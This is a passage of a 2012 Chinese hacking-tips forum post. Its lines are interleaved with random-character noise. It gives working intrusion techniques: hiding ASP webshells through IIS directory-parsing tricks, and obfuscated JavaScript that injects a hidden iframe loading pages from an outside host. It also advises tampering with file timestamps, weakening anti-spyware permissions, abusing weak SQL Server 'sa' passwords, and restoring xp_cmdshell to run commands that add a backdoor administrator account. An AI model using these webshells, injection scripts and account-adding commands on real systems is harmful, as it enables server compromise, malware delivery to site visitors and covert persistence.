/ n' |: C' T& w+ E4 B3 i, m1 _6 Y执行后可以用AT命令查看新加的任务
5 Z" s/ o) m* L; o+ Q. n9 S# W用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
H5 p# @& t3 [: a5 q: K5 h) h n8 D" M7 x% g
53、隐藏ASP后门的两种方法
5 b) w; W% k% j5 P0 X$ K A1、建立非标准目录:mkdir images..\
! ^( x H9 F& C: n( P5 Z拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 j% F+ v- M, o4 a
通过web访问ASP木马:http://ip/images../news.asp?action=login0 i! ?; A" H' k. @
如何删除非标准目录:rmdir images..\ /s) L7 q& l! |" h8 W8 L, g0 @* M
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:- Z2 ~6 R. z. T: K
mkdir programme.asp
9 ~0 n; |3 J2 X1 R/ ?新建1.txt文件内容:<!--#include file=”12.jpg”-->
! Z9 t5 K( J/ q/ J& z2 v新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
# v* |+ A* I& o+ K* cattrib +H +S programme.asp# S" T* w% x" J" Z1 F2 f+ s* N
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! u* {2 V% U% `6 e, g/ [# \# A
7 Q& n( B, w$ I" g7 @54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" E2 H6 _- {/ g% T; _$ O- y
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。1 s. G( g [; j8 f/ H. z
& H6 T! }; r( ?3 e ~55、JS隐蔽挂马
( g' L. J3 C# n# w1 e- Y. ]1.
7 `+ g r$ s! X5 Pvar tr4c3="<iframe src=ht";6 {! j& I% a8 }& o
tr4c3 = tr4c3+"tp:/";5 |: P0 A9 {' ]6 [* x, m! |' Q1 d
tr4c3 = tr4c3+"/ww";
+ z) B% v. ]. F5 I# ptr4c3 = tr4c3+"w.tr4";
- y5 z3 r/ Q, |" Vtr4c3 = tr4c3+"c3.com/inc/m";
8 L3 ?% f6 B$ g" W7 K. otr4c3 = tr4c3+"m.htm style="display:none"></i";$ K* U- B4 D; ~9 X. t6 y
tr4c3 =tr4c3+"frame>'";# |8 P+ o; C* a- p
document.write(tr4c3);6 h3 { {+ O" w! E. X
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
% q1 `( P. k }$ i! K( `& F" P! H/ r V$ O" F* R# v# I
2./ q% _7 k( a6 h& w8 d
转换进制,然后用EVAL执行。如
) X9 x- u+ w+ R0 |eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");6 `% y \# J' v( A5 K2 d
不过这个有点显眼。
! ]* N" D/ O& w3.
J: I! t. ~; q1 wdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
; G" t; h# M) x- t' ~) Q: b最后一点,别忘了把文件的时间也修改下。
) c; Z# v M; k2 n1 C' G+ T, T5 q5 @( Q' a8 d P# N
56.3389终端入侵常用DOS命令( d& Q) X; x8 i9 H9 C
taskkill taskkill /PID 1248 /t
2 `! e; F4 k( l4 }1 U; H9 ]
& C: p f7 j( o. R) r& { vtasklist 查进程
) I" I( J* b! Y+ ] y E. e. h! ~) T6 ]5 {3 S6 O0 h% [4 p+ `
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. ~ K3 B. `; |$ a' K$ l* piisreset /reboot
+ @+ w2 M( V4 `! g* Xtsshutdn /reboot /delay:1 重起服务器
, n2 j; V' E- X8 H0 _
0 f2 q5 A \$ ~" dlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
) A& e) }$ H$ \! ^" _
' w+ b& Y |0 S4 Y6 r! Vquery user 查看当前终端用户在线情况3 }' D# ~# b2 V0 G# r
9 G$ g* V" c" \. ^* l$ {- E
要显示有关所有会话使用的进程的信息,请键入:query process *0 Z$ ?$ ~! I- D D+ D
" i `& c/ E) b0 g
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
! U: _/ e& w. t) y
5 _% {- X+ P2 z3 K" ]! U: p要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
3 L0 l& r' k5 q
+ T* b8 k. M: z* o) n3 m5 k4 d要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
( y s$ k) R3 z. T9 Z9 {- |) z4 ^- C z# j/ a- J% B% U o3 Q( u( l
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 U9 W6 J, Z" \2 D
* J6 u4 k2 F. G9 |7 Y命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- O3 L0 r- {- ^4 S- L1 U; \2 ]# N& A' ]" n' X" W/ r6 Y
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
$ F/ k6 q9 O3 o1 [
0 Y' y1 ?! w$ V# X9 V命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机- T/ |6 h9 U8 V) Q! G+ K
8 G3 M7 d0 k4 Y% z6 F) D9 M
56、在地址栏或按Ctrl+O,输入:
. E* y) n6 {& h, {3 E, k: ujavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
" X* j+ N: u; e K" S
8 f% U' n$ G* c. c. G8 m& I源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
6 v" V' w$ \+ n+ g0 r9 \
& ?& C; L; | _5 S57、net user的时候,是不能显示加$的用户,但是如果不处理的话,0 _8 z3 J4 d8 u' V
用net localgroup administrators是可以看到管理组下,加了$的用户的。0 T5 |$ n6 d X6 B
3 H0 r U0 k) O# ?5 y
58、 sa弱口令相关命令
. d+ ^* @ P _# k; t9 L
- {' ^8 f2 @( r# i) ^一.更改sa口令方法:- D' r! z H/ L% H
用sql综合利用工具连接后,执行命令:
) W/ V+ q0 Y6 K3 I9 u3 [6 zexec sp_password NULL,'20001001','sa'
5 {) x5 ]2 P. O' H(提示:慎用!)
- C' l3 W2 @+ z' `- w& ~5 A6 ~+ L% D6 \0 k! }$ i* p# S, ?
二.简单修补sa弱口令.
z6 l( f. W- d6 H: S% [1 @$ A {" m; k2 a5 R( v
方法1:查询分离器连接后执行:
$ b, `7 K6 F8 Z9 E9 n tif exists (select * from
+ J2 |$ M1 Y, t: M8 {: T6 Wdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
" L/ ]$ Q& T. Z. J( `OBJECTPROPERTY(id, N'IsExtendedProc') = 1)2 c1 o' J; Z7 ~' N# v4 z" j
. a2 A& C0 U1 K. X% |5 }
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
S7 }7 `6 j/ l9 @8 c: w
2 @7 E5 H0 W5 M* o, A: tGO1 h/ V$ R' b- q0 x% v
+ H& P/ _6 B) z: ?& ] q1 K, G+ S然后按F5键命令执行完毕
3 ]& ?7 H/ t" M1 i3 o+ q# V% o# R7 b; `7 K1 e% K8 U
方法2:查询分离器连接后
; w H/ o+ p- u1 b0 P第一步执行:use master
3 d/ C; j) c! t1 d4 T第二步执行:sp_dropextendedproc 'xp_cmdshell'7 B7 O- s- M( @# | m/ b7 z
然后按F5键命令执行完毕3 y/ n" L* C: x
. }6 ~) {9 ~' _8 s/ x
+ ?$ C% E3 R7 H$ j, k( k" N1 G* D
三.常见情况恢复执行xp_cmdshell.
+ G* N7 ^/ J8 i- A' l9 t9 W+ r- x) C: Y, p; s2 L8 `
$ V, G4 ~4 b% ~/ }- G
1 未能找到存储过程'master..xpcmdshell'.
$ r. M2 H7 Q! s% O6 L 恢复方法:查询分离器连接后,/ ~8 d: \7 |7 U
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
' D, V! Q, }+ h1 Q6 J# @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' F5 m! [, t( _
然后按F5键命令执行完毕
+ ?& T, M( K. g' m4 Q
+ b3 s, p9 b8 V" M: H6 B2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
) o- {* p3 Y# \( M恢复方法:查询分离器连接后,! I6 k1 l" o& A% Z( B1 s; `
第一步执行:sp_dropextendedproc "xp_cmdshell"& J. R2 `! }2 u7 z/ \
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, Z3 a$ X: y. ^# p" [& y8 z g- Y$ e7 z然后按F5键命令执行完毕
) X" I6 ?5 x0 |
4 J& n! q3 `- G% Y/ h( a3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" u% @$ S, e8 f1 J J恢复方法:查询分离器连接后,
" |# K- Q. B+ c% r第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
1 ]5 `' |. y$ C: w2 l* Y' o2 p第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ' T2 p/ w8 s8 d+ a- Y9 p; X8 H) h: W: A6 \
然后按F5键命令执行完毕
$ O. }3 F4 A' X x3 F; n
, N% X. B* X- v; P1 K+ L四.终极方法.
3 N& _3 t. K8 M1 d/ [ d如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
! w" X% L* V, [0 i* M2 Z查询分离器连接后,
' ^* m* N$ M4 B. x/ L U+ B2000servser系统:3 |9 `8 |) ~) C6 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'% E1 J5 I( @. s: I5 v
+ m; i$ q7 G0 W. x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 v. e+ n5 o9 W5 L1 ]5 W+ A3 R! j
xp或2003server系统:
1 V; o' d, b" u5 l; @; \3 D9 D4 a9 S6 G8 ]) A* _/ Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. x* z$ V+ ]2 l/ D# X7 {
. x. i" A# c/ z' c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 N U$ ~' n8 H5 Z
|
发表于 2012-9-15 14:13:15
收藏
支持
反对